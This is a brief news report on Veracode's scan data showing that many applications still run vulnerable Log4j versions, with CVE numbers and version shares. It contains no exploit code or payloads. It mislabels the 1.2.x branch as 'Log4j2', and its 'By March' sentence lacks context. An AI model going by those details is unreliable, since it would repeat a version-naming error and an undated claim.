Organizations are still exposed to critical vulnerabilities in Log4j, two years after a maximum severity bug was found in the popular utility, according to Veracode.
The application security vendor analyzed data from software scans over 90 days between August 15 and November 15 2023.
These covered 38,278 unique applications running Log4j versions 1.1 to 3.0.0-alpha1 across 3866 organizations.
The vendor found that 38% are still using vulnerable versions of Log4j.
The majority of these are running Log4j2 1.2.x, which contains three critical flaws: CVE-2022-23307, CVE-2022-23305 and CVE-2022-23302.
A further 3.8% are running Log4j2 2.17.0, which contains CVE-2021-44832.
Just 2.8% are still on versions exposed to the Log4Shell vulnerabilities: Log4j2 2.0-beta9 to 2.15.0.
The remote code execution vulnerability itself was also relatively easy for threat actors to exploit, as long as they could force a vulnerable application to log a particular string of characters.
By March, some of the worst fears of security community were realised after new research revealed that Log4Shell had been used as an initial infection vector in 31% of compromises.
Veracode argued that although the massive effort to patch the original Log4j bug has been successful, its findings show there's still some way to go.
This Cyber News was published on www.infosecurity-magazine.com. Publication date: Mon, 11 Dec 2023 09:30:19 +0000